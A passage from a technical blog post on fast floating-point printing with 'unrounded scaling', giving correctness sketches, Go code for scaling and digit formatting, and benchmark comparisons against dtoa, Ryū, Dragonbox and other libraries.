<math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math> is approximating division by <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math> (remember that <math><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></math> is a positive number!).
The 128-bit approximation is precise enough that when <math><mi>x</mi></math> is a
multiple of <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math>, only the lowest <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> bits are non-zero;
discarding them keeps the unrounded form exact.
And when <math><mi>x</mi></math> is not a multiple of <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math>,
the result has a fractional part that must be at least
<math><mrow><mn>1/5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math> away from an integer.
That fractional separation is much larger than the maximum error in the product,
so the high bits saved in the unrounded form are correct;
the fraction is also repeating, so that there is guaranteed
to be a 1 bit to cause the unrounded form to be marked inexact.
So <code>uscale</code> is correct for small negative <math><mi>p</mi></math>.
<p>
Finally, we must handle large <math><mi>p</mi></math>, which always have a non-zero error
and therefore should always return unrounded numbers marked inexact
(with the sticky bit set to 1).
Consider the effect of adding a small error to the idealized “correct” <math><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup></mrow></math>,
producing <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math>.
The error is at most 64 bits.
Adding that error to the 192-bit product can certainly affect
the low 64 bits, and it may also generate a carry out of the low 64
into the middle 64 bits.
The carry turns 1 bits into 0 bits from right to left
until it hits a 0 bit;
that first 0 bit becomes a 1, and the carry stops.
The key insight is that seeing a 1 in the middle bits
is proof that the carry did not reach the high bits,
so the high bits are correct.
(Seeing a 1 in the middle bits also ensures that
the unrounded form is marked inexact, as it must be,
even though we discarded the low bits.)
Using a program backed by careful math, we can analyze all the <math><mtext><i>pm</i></mtext></math> in our table,
showing that every possible <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math> has a 1 in the middle bits.
So <code>uscale</code> is correct for large <math><mi>p</mi></math>.
<a class=anchor href="#omit_needless_multiplications"><h2 id="omit_needless_multiplications">Omit Needless Multiplications</h2></a>
<p>
We have a fast and correct <code>uscale</code>, but we can make it faster
now that we understand the importance of carry bits.
The idea is to compute the high 64 bits of the product
and then use them directly whenever possible,
skipping the multiplication by the low 64 bits of <math><mtext><i>pm</i></mtext></math> entirely.
To make this work, we need the high 64 bits to be rounded up,
a ceiling instead of a floor.
So we will change the <code>pmHiLo</code> from representing <math><mrow><mtext><i>hi</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>+</mo><mtext><i>lo</i></mtext></mrow></math>
to <math><mrow><mtext><i>hi</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>−</mo><mtext><i>lo</i></mtext></mrow></math>.
<div class=showcode><pre><span class=showcode-comment>// A pmHiLo represents hi<<64 - lo.</span>
type pmHiLo struct {
hi uint64
lo uint64
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L280-L283">fpfmt/fpfmt.go:280,283</a></div><div class=showcode-end></div>
<p>
The exact computation using this form would be:
<pre>hi, mid := bits.Mul64(x, c.pm.hi)
mid2, lo := bits.Mul64(x, c.pm.lo)
mid, carry := bits.Sub64(mid, mid2, bool2[uint64](lo > 0))
hi -= carry
return unrounded(hi >> c.s) | bool2[unrounded](hi&((1<<c.s)-1) != 0 || mid != 0)
</pre>
<p>
The 128-bit product <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext><mn>.</mn><mtext><i>hi</i></mtext></mrow></math> computed on the first line
may be too big by an error of up to <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup></mrow></math>,
which may or may not affect the high 64 bits.
The middle three lines correct the product,
possibly subtracting 1 from <math><mtext><i>hi</i></mtext></math>.
As in the proof sketch, if any of the bottom <math><mi>s</mi></math> bits of the approximate <math><mtext><i>hi</i></mtext></math> is a 1 bit,
that 1 bit stops the subtracted carry from
affecting the higher bits, indicating that we don’t need to correct the product.
<p>
Using this insight, the optimized <code>uscale</code> is:
<div class=showcode><pre><span class=showcode-comment>// uscale returns unround(x * 2**e * 10**p).</span>
<span class=showcode-comment>// The caller should pass c = prescale(e, p, log2Pow10(p))</span>
<span class=showcode-comment>// and should have left-justified x so its high bit is set.</span>
func uscale(x uint64, c scaler) unrounded {
hi, mid := bits.Mul64(x, c.pm.hi)
sticky := uint64(1)
if hi&(1<<(c.s&63)-1) == 0 {
mid2, _ := bits.Mul64(x, c.pm.lo)
sticky = bool2[uint64](mid-mid2 > 1)
hi -= bool2[uint64](mid < mid2)
}
return unrounded(hi>>c.s | sticky)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L298-L309">fpfmt/fpfmt.go:298,309</a></div><div class=showcode-end></div>
<p>
The fix-up looks different from the exact computation above,
but it has the same effect.
We don’t need the actual final value of <math><mtext><i>mid</i></mtext></math>, only the carry
and its effect on the sticky bit.
<p>
On some systems, notably x86-64, <code>bits.Mul64</code> computes both results in a single instruction.
On other systems, notably ARM64, <code>bits.Mul64</code> must use two different instructions;
it helps on those systems to write the code this way,
optimizing away the computation for the low half of <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext><mn>.</mn><mtext><i>lo</i></mtext></mrow></math>.
<p>
The more bits that are being shifted out of <code>hi</code>,
the more likely it is that a 1 bit is being shifted out,
so that we have an answer after only the first <code>bits.Mul64</code>.
When <code>Short</code> calls <code>uscale</code>, it passes two <math><mi>x</mi></math> that
differ only in a single bit
and multiplies them by the same <math><mrow><mtext><i>pm</i></mtext><mn>.</mn><mtext><i>hi</i></mtext></mrow></math>.
While one of them might clear the low <math><mi>s</mi></math> bits of <math><mtext><i>hi</i></mtext></math>,
the other is unlikely to also clear them,
so we are likely to hit the fast path at least once,
if not twice.
In the case where <code>Short</code> calls <code>uscale</code> three times,
we are likely to hit the fast path at least twice.
This optimization means that, most of the time, a <code>uscale</code>
is implemented by a single wide multiply.
This is the main reason that <code>Short</code> runs faster than
Ryū, Schubfach, and Dragonbox, as we will see in the next section.
<a class=anchor href="#performance"><h2 id="performance">Performance</h2></a>
<p>
I promised these algorithms would be simple <i>and</i> fast.
I hope you are convinced about simple.
(If not, keep in mind that the implementations in widespread
use today are far more complicated!)
Now it is time to evaluate ‘fast’
by comparing against other implementations.
All the other implementations are written in C or C++ and compiled by a C/C++ compiler.
To isolate compilation differences,
I translated the Go code to C and measured
both the Go code and the C translation.
<p>
I ran the benchmarks on two systems.
<ul>
<li>
Apple M4 (2025 MacBook Air ‘Mac16,12’), 32 GB RAM, macOS 26.1, Apple clang 17.0.0 (clang-1700.6.3.2)
<li>
AMD Ryzen 9 7950X, 128 GB RAM, Linux 6.17.9 and libc6 2.39-0ubuntu8.6, Ubuntu clang 18.1.3 (1ubuntu1)</ul>
<p>
Both systems used Go 1.26rc1.
The full benchmark code is in the <a href="https://pkg.go.dev/rsc.io/fpfmt"><code>rsc.io/fpfmt</code> package</a>.
<a class=anchor href="#printing_text"><h3 id="printing_text">Printing Text</h3></a>
<p>
Real implementations generate strings, so we need to write
code to convert the integers we have been returning into digit sequences,
like this:
<div class=showcode><pre><span class=showcode-comment>// formatBase10 formats the decimal representation of u into a.</span>
<span class=showcode-comment>// The caller is responsible for ensuring that a is big enough to hold u.</span>
<span class=showcode-comment>// If a is too big, leading zeros will be filled in as needed.</span>
func formatBase10(a []byte, u uint64) {
for nd := len(a) - 1; nd >= 0; nd-- {
a[nd] = byte(u%10 + '0')
u /= 10
}
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L368-L375">fpfmt/unopt/fpfmt.go:368,375</a></div><div class=showcode-end></div>
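<p>
For example (my own trace of the code above):
<pre>a := make([]byte, 5)
formatBase10(a, 42) // a is now []byte("00042")
</pre>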
<p>
Unfortunately, if we connect our fast <code>FixedWidth</code> and <code>Short</code> to this
version of <code>formatBase10</code>, benchmarks spend most of their time in the formatting loop.
There are a variety of clever ways to speed up digit formatting.
For our purposes, it suffices to use the old trick of
splitting the number into two-digit chunks and
then converting each chunk by
indexing a 200-byte lookup table (more precisely, a “lookup string”) of all 2-digit values from 00 to 99:
<div class=showcode><pre><span class=showcode-comment>// i2a is the formatting of 00..99 concatenated,</span>
<span class=showcode-comment>// a lookup table for formatting [0, 99].</span>
const i2a = "00010203040506070809" +
"10111213141516171819" +
"20212223242526272829" +
"30313233343536373839" +
"40414243444546474849" +
"50515253545556575859" +
"60616263646566676869" +
"70717273747576777879" +
"80818283848586878889" +
"90919293949596979899"</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L353-L363">fpfmt/fpfmt.go:353,363</a></div><div class=showcode-end></div>
<p>
Using this table and unrolling the loop to allow the
compiler to optimize away bounds checks, we end up with <code>formatBase10</code>:
<div class=showcode><pre><span class=showcode-comment>// formatBase10 formats the decimal representation of u into a.</span>
<span class=showcode-comment>// The caller is responsible for ensuring that a is big enough to hold u.</span>
<span class=showcode-comment>// If a is too big, leading zeros will be filled in as needed.</span>
func formatBase10(a []byte, u uint64) {
nd := len(a)
for nd >= 8 {
<span class=showcode-comment>// Format last 8 digits (4 pairs).</span>
x3210 := uint32(u % 1e8)
u /= 1e8
x32, x10 := x3210/1e4, x3210%1e4
x1, x0 := (x10/100)*2, (x10%100)*2
x3, x2 := (x32/100)*2, (x32%100)*2
a[nd-1], a[nd-2] = i2a[x0+1], i2a[x0]
a[nd-3], a[nd-4] = i2a[x1+1], i2a[x1]
a[nd-5], a[nd-6] = i2a[x2+1], i2a[x2]
a[nd-7], a[nd-8] = i2a[x3+1], i2a[x3]
nd -= 8
}
x := uint32(u)
if nd >= 4 {
<span class=showcode-comment>// Format last 4 digits (2 pairs).</span>
x10 := x % 1e4
x /= 1e4
x1, x0 := (x10/100)*2, (x10%100)*2
a[nd-1], a[nd-2] = i2a[x0+1], i2a[x0]
a[nd-3], a[nd-4] = i2a[x1+1], i2a[x1]
nd -= 4
}
if nd >= 2 {
<span class=showcode-comment>// Format last 2 digits.</span>
x0 := (x % 1e2) * 2
x /= 1e2
a[nd-1], a[nd-2] = i2a[x0+1], i2a[x0]
nd -= 2
}
if nd > 0 {
<span class=showcode-comment>// Format final digit.</span>
a[0] = byte('0' + x)
}
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L366-L405">fpfmt/fpfmt.go:366,405</a></div><div class=showcode-end></div>
<p>
This is more code than I’d prefer, but it is at least straightforward.
I’ve seen much more complex versions.
<p>
With <code>formatBase10</code>, we can build <code>Fmt</code>, which formats in standard exponential notation:
<div class=showcode><pre><span class=showcode-comment>// Fmt formats d, p into s in exponential notation.</span>
<span class=showcode-comment>// The caller must pass nd set to the number of digits in d.</span>
<span class=showcode-comment>// It returns the number of bytes written to s.</span>
func Fmt(s []byte, d uint64, p, nd int) int {
<span class=showcode-comment>// Put digits into s, leaving room for decimal point.</span>
formatBase10(s[1:nd+1], d)
p += nd - 1
<span class=showcode-comment>// Move first digit up and insert decimal point.</span>
s[0] = s[1]
n := nd
if n > 1 {
s[1] = '.'
n++
}
<span class=showcode-comment>// Add 2- or 3-digit exponent.</span>
s[n] = 'e'
if p < 0 {
s[n+1] = '-'
p = -p
} else {
s[n+1] = '+'
}
if p < 100 {
s[n+2] = i2a[p*2]
s[n+3] = i2a[p*2+1]
return n + 4
}
s[n+2] = byte('0' + p/100)
s[n+3] = i2a[(p%100)*2]
s[n+4] = i2a[(p%100)*2+1]
return n + 5
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L312-L344">fpfmt/fpfmt.go:312,344</a></div><div class=showcode-end></div>
<p>
When calling <code>Fmt</code> with a <code>FixedWidth</code> result, we know the digit count <code>nd</code> already.
For a <code>Short</code> result, we can compute the digit count easily from the bit length:
<div class=showcode><pre><span class=showcode-comment>// Digits returns the number of decimal digits in d.</span>
func Digits(d uint64) int {
nd := log10Pow2(bits.Len64(d))
return nd + bool2[int](d >= uint64pow10[nd])
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L347-L350">fpfmt/fpfmt.go:347,350</a></div><div class=showcode-end></div>
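<p>
Putting the pieces together, a caller might produce the shortest exponential form like this
(my own example; the traced values are what I expect from the code above,
not output from the repository’s tests):
<pre>buf := make([]byte, 32)
d, p := Short(6.02214076e23)   // d == 602214076, p == 15
n := Fmt(buf, d, p, Digits(d)) // Digits(d) == 9
s := string(buf[:n])           // "6.02214076e+23"
</pre>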
<a class=anchor href="#fixed-width_performance"><h3 id="fixed-width_performance">Fixed-Width Performance</h3></a>
<p>
To evaluate fixed-width printing,
we need to decide which floating-point values to convert.
I generated 10,000 uint64s in the range <math><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo stretchy=false>)</mo></mrow></math> and used them as
float64 bit patterns.
The limited range avoids negative numbers, infinities, and NaNs.
The benchmarks all use Go’s
<a href="https://go.dev/blog/chacha8rand">ChaCha8-based generator</a>
with a fixed seed for reproducibility.
To reduce timing overhead, the benchmark builds an array of 1000 copies of the value
and calls a function that converts every value in the array in sequence.
To reduce noise, the benchmark times that function call 25 times and uses the median timing.
We also have to decide how many digits to ask for:
longer sequences are more difficult.
Although I investigated a wider range, in this post I’ll show
two representative widths: 6 digits (C <code>printf</code>’s default) and 17 digits
(the minimum to guarantee accurate round trips, so widely used).
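<p>
As an aside on the inputs, here is a sketch of how such bit patterns can be generated
with a fixed ChaCha8 seed (the seed and exact structure are my assumptions;
the actual benchmark harness may differ in detail):
<pre>// Uses math and math/rand/v2.
func randomFloats() []float64 {
	src := rand.NewChaCha8([32]byte{}) // fixed seed for reproducibility
	r := rand.New(src)
	lo := uint64(1)
	hi := uint64(1)<<63 - uint64(1)<<52 // excludes negatives, infinities, NaNs
	inputs := make([]float64, 10000)
	for i := range inputs {
		inputs[i] = math.Float64frombits(lo + r.Uint64N(hi-lo))
	}
	return inputs
}
</pre>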
<p>
The implementations I timed are:
<ul>
<li>
<b>dblconv</b>: Loitsch’s <a href="https://github.com/google/double-conversion">double-conversion library</a>, using the <code>ToExponential</code> function.
This library, used in Google Chrome,
implements a handful of special cases for small binary exponents
and falls back to a bignum-based printer for larger exponents.
<li>
<b>dmg1997</b>: Gay’s <a href="https://netlib.org/fp/"><code>dtoa.c</code></a>, <a href="https://web.archive.org/web/19970415033207/https://www.netlib.org/fp/dtoa.c">archived in 1997</a>.
For our purposes, this represents Gay’s original C implementation
described in his technical report from 1990 [<a class=footref id='fnref-11' href='#fn-11'>11</a>].
I confirmed that this 1997 snapshot runs at the same speed as
(and has no significant code changes compared to)
another copy dating back to May 1991 or earlier.
<li>
<b>dmg2017</b>: Gay’s <a href="https://netlib.org/fp/"><code>dtoa.c</code></a>, <a href="https://web.archive.org/web/20170421060916/https://www.netlib.org/fp/dtoa.c">archived in 2017</a>.
In 2017, Gay published an updated version of <code>dtoa.c</code> that uses <code>uint64</code> math and
a table of 96-bit powers of ten. It is significantly faster than the original version (see below).
In November 2025, I confirmed that the latest version runs at the same speed as this one.
<li>
<b>libc</b>:
The C standard library conversion using <code>sprintf("%.*e", prec-1)</code>.
The conversion algorithm varies by C library.
The macOS C library seems to wrap a pre-2017 version of <code>dtoa.c</code>,
while Linux’s glibc uses its own bignum-based code.
In general the C library implementations have not kept pace
with recent algorithms and are slower than any of the others.
<li>
<b>ryu</b>: Adams’s <a href="https://github.com/ulfjack/ryu">Ryū library</a>, using the <code>d2exp_buffered</code> function.
It uses the Ryū Printf algorithm [<a class=footref id='fnref-3-2' href='#fn-3'>3</a>].
<li>
<b>uscale</b>: The unrounded scaling approach, using the Go code in this post.
<li>
<b>uscalec</b>: A C translation of the unrounded scaling Go code.</ul>
<p>
Here is a scatterplot showing the times required to format <math><mi>f</mi></math> to 17 digits,
running on the Linux system:
<p>
<a href="fpfmt/plot/fpfmt-ryzen-fixed17-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed17-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed17-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed17-scat.png 1x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@4x.png 4x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@6.png 6, fpfmt/plot/fpfmt-ryzen-fixed17-scat@6x2.png 6x2"></a>
<p>
(Click on any of the graphs in this post for a larger view.)
<p>
The X axis is the log of the floating point input <math><mi>f</mi></math>,
and
the Y axis is the time required for a single conversion of the given input.
The scatterplot makes many things clear. For example, it is obvious that
there are two kinds of implementations.
Those that use bignums take longer for large exponents and
have a “winged” scatterplot,
while those that avoid bignums run at a mostly constant speed across
the entire exponent range.
The scatterplot also highlights many interesting data-dependent patterns in the timings,
most of which I have not investigated.
A friend remarked that you could probably spend a whole career
analyzing the patterns in this one plot.
<p>
For our purposes, it would help to have a clearer comparison
of the speed of the different algorithms.
The right tool for that is a plot of the cumulative distribution function (CDF),
which looks like this:
<p>
<a href="fpfmt/plot/fpfmt-ryzen-fixed17-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed17-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed17-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed17-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@4x.png 4x"></a>
<p>
Now time is on the X axis (still log scale), and the Y axis plots what
fraction of the inputs ran in that time or less.
For example, we can see that dblconv’s fast path applies to most inputs,
but its slow path is much slower than Linux glibc or
even Gay’s original C library.
<p>
The CDF only plots the middle 99.9% of timings
(dropping the 0.05% fastest and slowest),
to avoid tails caused by measurement noise.
In general, measurements are noisier on the Mac because
ARM64 timers only provide ~20ns precision,
compared to the x86’s sub-nanosecond precision.
<p>
Here are the scatterplots and CDFs for 6-digit output on the two systems:
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table2>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-fixed6-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-fixed6-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-fixed6-scat.png" srcset="fpfmt/plot/fpfmt-apple-fixed6-scat.png 1x, fpfmt/plot/fpfmt-apple-fixed6-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-fixed6-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-fixed6-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-fixed6-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-fixed6-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-fixed6-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-fixed6-cdf.png" srcset="fpfmt/plot/fpfmt-apple-fixed6-cdf.png 1x, fpfmt/plot/fpfmt-apple-fixed6-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-fixed6-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-fixed6-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-fixed6-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-fixed6-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed6-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed6-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed6-scat.png 1x, fpfmt/plot/fpfmt-ryzen-fixed6-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed6-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed6-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed6-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-fixed6-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed6-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed6-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed6-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-fixed6-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed6-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed6-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed6-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
For short output, various special-case optimizations are possible
to avoid bignums, and the scatterplots make clear that
all the implementations do that,
except for Linux glibc.
It surprises me that both libc implementations are so much slower
than David Gay’s original dtoa from 1990 (dmg1997).
I expected that any new attempt at floating-point printing
would at least make sure it was as fast as the canonical
reference implementation.
<p>
Here are the results for 17-digit output:
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table3>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-fixed17-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-fixed17-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-fixed17-scat.png" srcset="fpfmt/plot/fpfmt-apple-fixed17-scat.png 1x, fpfmt/plot/fpfmt-apple-fixed17-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-fixed17-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-fixed17-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-fixed17-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-fixed17-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-fixed17-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-fixed17-cdf.png" srcset="fpfmt/plot/fpfmt-apple-fixed17-cdf.png 1x, fpfmt/plot/fpfmt-apple-fixed17-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-fixed17-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-fixed17-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-fixed17-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-fixed17-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed17-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed17-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed17-scat.png 1x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@4x.png 4x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@6.png 6, fpfmt/plot/fpfmt-ryzen-fixed17-scat@6x2.png 6x2"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-fixed17-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed17-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed17-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed17-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
In this case, fewer optimizations are available,
and libc has a winged scatterplot on both systems.
The dblconv library has a fast path that can be taken
about 99% of the time, but the scatterplot shows a shadow
of a wing for the remaining 1%.
The CDFs show the bignum-based implementations clearly:
they are slower and have a more gradual slope.
We can also read off the CDFs that dmg2017’s
table-based fast path handles about 95% of the inputs.
<p>
In general, fast fixed-width printing has not seen much
optimization attention.
Unrounded scaling almost has the field to itself
and is significantly faster than the other implementations.
<a class=anchor href="#shortest-width_performance"><h3 id="shortest-width_performance">Shortest-Width Performance</h3></a>
<p>
For shortest-width printing, I used the same set of random inputs as for fixed-width printing.
The implementations are:
<ul>
<li>
<b>dblconv</b>: Loitsch’s <a href="https://github.com/google/double-conversion">double-conversion library</a>, using the <code>ToShortest</code> function.
It uses the Grisu3 algorithm [<a class=footref id='fnref-23-2' href='#fn-23'>23</a>].
<li>
<b>dmg1997</b>: Gay’s 1997 <code>dtoa.c</code> in shortest-output mode.
<li>
<b>dmg2017</b>: Gay’s 2017 <code>dtoa.c</code> in shortest-output mode.
<li>
<b>dragonbox</b>: Jeon’s <a href="https://github.com/jk-jeon/dragonbox">dragonbox library</a>, using the <code>jkj::dragonbox::to_chars</code> function.
It uses the Dragonbox algorithm [<a class=footref id='fnref-17-2' href='#fn-17'>17</a>].
<li>
<b>ryu</b>: Adams’s <a href="https://github.com/ulfjack/ryu">Ryū library</a>, using the <code>d2s_buffered</code> function.
It uses the Ryū algorithm [<a class=footref id='fnref-2-2' href='#fn-2'>2</a>].
<li>
<b>schubfach</b>: A C++ translation of Giulietti’s Java implementation of Schubfach [<a class=footref id='fnref-12-2' href='#fn-12'>12</a>].
<li>
<b>uscale</b>: The unrounded scaling approach, using the Go code for <code>Short</code> and <code>Fmt</code> in this post.
<li>
<b>uscalec</b>: A C translation of the unrounded scaling Go code.</ul>
<p>
All these implementations are running different code than for fixed-width printing.
The C library does not provide shortest-width printing,
so there is no libc implementation to compare against.
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table4>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-short-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-short-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-short-scat.png" srcset="fpfmt/plot/fpfmt-apple-short-scat.png 1x, fpfmt/plot/fpfmt-apple-short-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-short-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-short-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-short-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-short-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-short-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-short-cdf.png" srcset="fpfmt/plot/fpfmt-apple-short-cdf.png 1x, fpfmt/plot/fpfmt-apple-short-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-short-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-short-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-short-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-short-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-short-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-short-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-short-scat.png 1x, fpfmt/plot/fpfmt-ryzen-short-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-short-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-short-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-short-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-short-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-short-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-short-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-short-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-short-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-short-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-short-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-short-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
There is much more competition here.
Other than Gay’s 1990 dtoa, everything runs quickly.
From the CDFs, we can see that Gay’s 2017 dtoa fast path runs about 85% of the time.
The C and Go unrounded scalings run at about the same speed as Ryū
but a bit slower than Dragonbox.
This turns out to be due mainly to Dragonbox’s digit formatter,
not the actual floating-point conversion.
<p>
To remove digit formatting from the comparison, I ran a set of benchmarks
of just <code>Short</code> (which returns an integer, not a digit string)
and equivalent code from Dragonbox, Schubfach, and Ryū.
For Dragonbox, I used <code>jkj::dragonbox::to_decimal</code>.
For Schubfach and Ryū, I added new entry points that
